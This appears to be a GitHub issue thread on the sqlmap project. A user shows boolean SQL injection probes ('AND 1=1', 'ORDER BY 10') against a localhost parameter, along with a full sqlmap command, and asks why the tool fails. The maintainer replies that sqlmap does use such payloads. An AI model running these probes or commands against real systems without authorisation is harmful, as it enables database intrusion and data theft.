### ISSUE TITLE
Test Payload: AND 1=1

### ISSUE THREAD

**Issue by maloba1** [sqlmapproject/sqlmap#4206]
**hello 
can't exploit this VUL with sqlmap**

http://127.0.0.1/profile=1 AND 1=1
> "profile":"1"

http://127.0.0.1/profile=1 AND 1=2
> false

**Log SQLMAP**
> sqlmap.py -u "http://127.0.0.1/profile=1" -p profile --batch --level 5 --risk 3 --random-agent

**I haven't been able to automate this with sqlmap, because it seem all payloads use "comments"**
**thank you**

**Comment by maloba1** [comment]
Request:

> http://127.0.0.1/profile=1 ORDER BY 9

Response:

> "profile":"1"

Request:

> http://127.0.0.1/profile=1 ORDER BY 10

Response:

> null

**Comment by stamparm** [comment]
A) `I haven't been able to automate this with sqlmap, because it seem all payloads use "comments"` <- absolutely not true:

![bbb](https://user-images.githubusercontent.com/921555/82452781-0199ce00-9ab0-11ea-97dd-553d474c52dc.png)

B) this is the most trivial payload that sqlmap uses. You have some other issues
